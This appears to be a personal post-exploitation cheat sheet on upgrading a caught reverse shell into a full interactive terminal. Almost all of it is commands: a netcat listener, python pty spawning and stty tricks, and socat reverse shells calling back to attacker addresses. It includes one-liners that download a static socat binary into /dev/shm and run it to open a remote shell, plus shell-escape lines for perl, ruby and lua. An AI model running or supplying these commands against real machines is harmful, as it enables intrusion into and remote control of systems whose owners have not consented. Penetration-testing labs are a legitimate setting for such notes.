Methods to make a new pty session:
- python pty
# Host
rlwrap nc -lvnp 4444
# Remote
export TERM=xterm-color
dpkg -l | grep python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
##ctrl+z
stty raw -echo; fg
# Back to remote
reset
stty rows 200 columns 200
# Path and alias
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
alias ll='clear ; ls -lsaht --color=auto'
- bash script
# remote
# script - make typescript of terminal session
# (1) do not store session log
script /dev/null -c /bin/bash
# (2) store session log
mkdir -p /dev/shm/qwe/; script /dev/shm/qwe/script.txt -c /bin/bash
# ctrl+z, local
$ stty size; stty raw -echo; fg
# remote
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>
- socat
# local
$ socat file:`tty`,raw,echo=0 tcp-listen:1234
# remote
$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
$ wget -q http://<IP>/socat -O /dev/shm/socat; chmod +x /dev/shm/socat; /dev/shm/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:1234
$ export $RHOST=10.10.16.12; export $PORT=80; export $RPORT=1234; wget -q http://$LOCAL:$PORT/socat -O /dev/shm/socat; chmod +x /dev/shm/socat; /dev/shm/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$RHOST:$RPORT
socat install: here
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat
- other languages
# bash
echo os.system('/bin/bash')
/bin/sh -i
# perl
perl -e 'exec "/bin/sh";'
# ruby
exec "/bin/sh"
ruby -e 'exec "/bin/sh"'
# lua
lua -e "os.execute('/bin/sh')"
Related information:
- tty
- pty
- stty
Mark:
Still have some problem with ctrl+c in upgraded shell. (Environment: kali & tmux & zsh & rlwrap nc + script + ctrl z + stty + reset)